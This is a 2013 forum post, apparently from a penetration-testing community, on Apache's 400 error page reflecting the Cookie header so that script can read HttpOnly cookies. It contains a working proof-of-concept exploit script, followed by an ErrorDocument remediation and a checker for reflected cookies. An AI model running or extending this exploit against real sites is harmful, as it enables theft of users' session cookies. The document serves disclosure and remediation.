China Network Penetration Testing Alliance

Title: Apache HttpOnly Cookie XSS cross-site vulnerability

Author: admin    Time: 2013-4-19 19:15
Title: Apache HttpOnly Cookie XSS cross-site vulnerability
Many applications, as well as a number of commercial or mature open-source CMS / article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing user cookies: the attribute prevents JavaScript from reading the cookie directly, which limits the damage an XSS bug can do. This Apache issue can be used to bypass exactly that HttpOnly protection, because Apache's default 400 Bad Request page echoes the offending request header, Cookie header included, in its body, and that body is readable by script even though the cookie itself is not.

Open a site in Chrome, press F12 to open the developer tools, go to the Console, enter the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, then split the remaining pairs
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].trim().split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();

You will then see a glorious 400 error with the cookie information inside it.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Remediation:

Apache officially offers four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:

In the event of a problem or error, Apache can be configured to do one of four things,

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In testing, only method 2 works for the 400 error; the response then no longer contains the cookie content.
Apache configuration:

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version also works :).
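To check that the ErrorDocument change (or an upgrade) really removed the reflection, the following added example, not part of the original post or of the exploit-db code, inspects a recorded 400 response body and reports whether it echoes the request's Cookie header. The two response bodies and all cookie values are constructed samples; the default-page layout follows Apache 2.2's stock 400 page.

```javascript
// Constructed sample: the stock Apache 2.2 "400 Bad Request" body returned when a
// request header field exceeds the server limit; the offending header is echoed in <pre>.
// The session cookie and padding cookie values are made up.
const DEFAULT_400 = [
  '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">',
  '<html><head><title>400 Bad Request</title></head><body>',
  '<h1>Bad Request</h1>',
  '<p>Your browser sent a request that this server could not understand.<br />',
  'Size of a request header field exceeds server limit.<br />',
  '<pre>',
  'Cookie: PHPSESSID=abc123; xss0=' + 'x'.repeat(819),
  '</pre>',
  '</p><hr>',
  '<address>Apache/2.2.21 (Unix) Server at example.com Port 80</address>',
  '</body></html>',
].join('\r\n');

// Constructed sample: the same 400 after applying `ErrorDocument 400 "security test"`.
const FIXED_400 = 'security test';

// Return the request headers an Apache error body echoes back, as {name: value}.
// An empty object means nothing from the request was reflected into the response.
function extractEchoedHeaders(body) {
  const echoed = {};
  const pre = /<pre>([\s\S]*?)<\/pre>/i.exec(body);
  if (!pre) return echoed;
  for (const line of pre[1].split(/\r?\n/)) {
    const m = /^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$/.exec(line.trim());
    if (m) echoed[m[1]] = m[2];
  }
  return echoed;
}

// True when the Cookie header is reflected: every cookie the browser attached to the
// request, HttpOnly ones included, is then readable from script via the response body.
function leaksCookie(body) {
  return Object.prototype.hasOwnProperty.call(extractEchoedHeaders(body), 'Cookie');
}

// Names of the cookies visible in a reflected Cookie header, ignoring the padding
// cookies (xss0..xss9) that only serve to push the header over the size limit.
function leakedCookieNames(body) {
  const cookie = extractEchoedHeaders(body).Cookie || '';
  return cookie.split(';')
    .map(c => c.trim().split('=', 1)[0])
    .filter(name => name && !/^xss\d$/.test(name));
}

console.log('default page leaks cookies:', leaksCookie(DEFAULT_400), leakedCookieNames(DEFAULT_400));
console.log('ErrorDocument page leaks cookies:', leaksCookie(FIXED_400));
```

Feed `leaksCookie` the body of any 400 response your own server returns; a `true` result means the error page is still reflecting request headers and the fix has not taken effect.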

Reference: http://httpd.apache.org/security/vulnerabilities_22.html
